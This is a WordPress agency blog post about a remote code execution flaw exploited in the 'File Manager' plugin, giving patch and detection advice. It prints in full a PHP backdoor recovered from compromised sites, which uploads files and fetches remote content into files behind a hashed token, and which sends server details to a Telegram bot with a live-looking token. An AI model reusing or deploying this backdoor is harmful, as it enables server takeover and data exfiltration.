Scroll to top
USA
651 N Broad St, Suite 206,
MiddleTown, New Castle,
Delaware - 19709
Canada
635 Ashprior Avenue,
Mississauga, Ontario,
Canada - L5R3N6
India
34, Shiwanshu Bunglows
Vadodara, Gujarat - 390007

A Plugin bug that is breaking thousands of WordPress Websites

60 / 100

Remote Code Execution Flaw in File Manager

On September 1st, a few web security providers detected suspicious activity on several WordPress sites. Turns out, hackers were exploiting a remote code execution flaw (RCE) on sites that had the plugin “File manager” installed. File Manager is a popular WordPress plugin that allows you to easily access your site files directly from the WordPress dashboard.

More digging by security experts revealed that hackers had gained access to WordPress sites through this plugin and were running malicious code and scripts; this zero-day vulnerability in the plugin’s core files could allow hackers to do anything they wanted: destroy target sites, steal confidential user information and corrupt databases.

Although File Manager released a security patch immediately, a version 6.9 that fixes all the vulnerabilities in versions 6.8 or older, File Manager is installed on over 700K+ websites. This is a huge concern; Kinsta’s Malware and abuse engineer, S Aguilar, tweeted that “hundreds” of sites are at risk as malicious code is being uploaded to File Manager’s core file 

/wp-content/plugins/wp-file-manager/lib/files.  Aguilar mentions that updating the plugin to version 6.9 can mitigate risk for site owners, but most site owners don’t really take out the time to take this crucial step. 

Nintechnet, a Thai web security service, shared a snippet of code they found lurking in the plugin files they scanned:

try{
            if($_POST[‘action’]==”wp_ajax_try_2020_v2″){
               if(!empty ($_FILES[‘file’]) and md5(md5(md5($_POST[‘token_admin’])))==”4baa15b2adf2fac31c44f28d9c86daa7″){
                 if(function_exists(“move_uploaded_file”)){
                  @move_uploaded_file($_FILES[‘file’][‘tmp_name’],”../”.$_FILES[‘file’][‘name’]);
                  echo ” file name : “.$_FILES[‘file’][‘name’];
                      }else{
                         die(“no move_upload_file”);
                      }                    
               }else{
                  die(0);
               }               
               exit();
            }
            if($_POST[‘action’]==”wp_ajax_try_2020_v3″){
               if(!empty ($_POST[‘content’]) and md5(md5(md5($_POST[‘token_admin’])))==”4baa15b2adf2fac31c44f28d9c86daa7″){
                  if(function_exists(“file_get_contents”)){
                          $html=file_get_contents($_POST[‘content’]);
                    $save=fopen($_POST[‘name’],”w”);
                    fwrite($save,$html);
                    fclose($save);
                  }else{
                           die(“no file_get_contents”);
                  }                     
               }else{
                  die(0);
               }               
               exit();
            }         
         }catch (Exception $e) {
            if(function_exists(“file_get_contents”)){
               try{
                  file_get_contents(“https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=” . urlencode($_SERVER[‘REMOTE_ADDR’].”  error wp”).”” );
                  file_get_contents(“https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=” . urlencode($e).”” );
               }catch (Exception $e2) {}
               
            }            
         }

Point of Access

The first to inform File Manger’s developers about this security flaw was the Finnish web hosting service, Seravo. Seravo did its own research on the website breach; they closely monitored patterns in traffic spikes and IP addresses.

 On closer inspection, they discovered that Botnets were exploiting this vulnerability in the wild, Aguilar’s tweet confirms this:

“There are two bots we’ve identified, one from Bangladesh and another one from France using Inulogic Virtual Private Servers. We are working on containing this now.”

Now what OR How do I know if my site is hacked?

All security experts who worked on this zero-day vulnerability flaw had one important recommendation: Update to File manager version 6.9 now.

 Wordfence suggested users scan their File Manager files for the following PHP files:

  1. hardfork.php
  2. hardfind.php
  3. x.php

If you think your website is at risk, contact us at WP Uber for customized security reports and solutions. Follow WP Uber for more security updates.

Author avatar
Tim Michaels
I am into WordPress and web development for the last 10 years. I use my experience to help people just starting with WordPress. Follow my blog at WP Uber for everything related to WordPress.
We use cookies to give you the best experience.
Do NOT follow this link or you will be banned from the site!